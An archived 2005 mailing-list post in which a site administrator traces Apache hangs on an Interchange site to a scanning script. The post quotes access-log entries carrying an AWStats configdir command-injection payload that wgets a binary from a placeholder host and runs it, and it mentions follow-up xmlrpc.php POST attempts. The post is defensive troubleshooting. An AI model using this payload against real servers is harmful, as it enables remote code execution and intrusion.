########### snippet from previous post: The Apache access log shows just 3 entries before the site went down, all from hackers_IP. For interest, these were along the lines of: /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo| ##########OK, it's conclusive, the above "hacker" script is definitely the cause of our site stopping responding at the moment (and I suspect Ron's and Jeff's also - can you confirm this?). Our site stopped responding again tonight and was restarted by Ron's script again. This time the site went down when there were many connections, but one IP address stood out as having 10 connections to Apache. Sure enough, when I searched our Apache access log for access from this suspicious IP address I saw the same 3 entries as the last time the site stopped responding:
1) /awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo| 2) /cgi-bin/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo| 3) /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|Now these were the only 3 entries, but searching around on the web I have found that this script goes on to try to exploit the xml-rpc vulnerability by sending a variety of POST requests to xmlrpc.php (which it tries to find in a variety of locations)
e.g. POST /drupal/xmlrpc.php with XML in the body of the POST request.Here is an analysis of the packets sent (not particularly readable, but all the information is there):
http://www.philippinehoneynet.org/charts_2005-11-11/awstats.htmlThere are many references to this hacking script on the web - most dated Nov 2005, so it appears to be a very new script. Here are a couple of links to overviews:
http://www.philippinehoneynet.org/dataarchive.php?date=2005-11-11 http://isc.sans.org/diary.php?storyid=823We did have several sites running on the same Apache webserver, but they were all development sites, so once Apache started hanging I decided to remove all the other sites so that Apache was only hosting our main Interchange website. Interestingly, prior to removing these other websites I was seeing these POST requests to xmlrpc.php in the Apache error log (but in relation to our *non-interchange* websites). Since removing these websites, I am not seeing any of these xmlrpc.php POST attempts in the Apache error log.
As mentioned, the *only* 3 requests from the hacker's ip address before the site stops responding are the 3 awstats.pl GET requests. I believe the 4th reqest (which we don't see in the log) is a POST request to xmlrpc.php
From this, I conclude that this same script when used against our otherwebsites was not causing Apache to fall over. But, when used against our Interchange site the webserver does stop responding. So, it looks like it is these POST attempts to non-existent pages on our Interchange site that are causing Apache to hang, so I presume it is mod_interchange that is being tripped up by these POST requests.
I know that the Interchange missing.html page is served up if a GET request is made for a non-existent page, but what happens if a POST request is made for a non-existent page? As mentioned, the POST request tries to send some XML in the body of its request (the above 2 links provide more detail).
Kevin, I am rather hoping that you may be able to spot a reason why mod_interchange may not be coping well with these POST requests to the non-existent xmlrpc.php page? Thank you everyone for your continued help on trying to solve this one - hopefully we are getting closer...
___________________________________________________________ Yahoo! Model Search 2005 - Find the next catwalk superstars - http://uk.news.yahoo.com/hot/model-search/
_______________________________________________ interchange-users mailing list suppressed http://www.icdevgroup.org/mailman/listinfo/interchange-users
Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.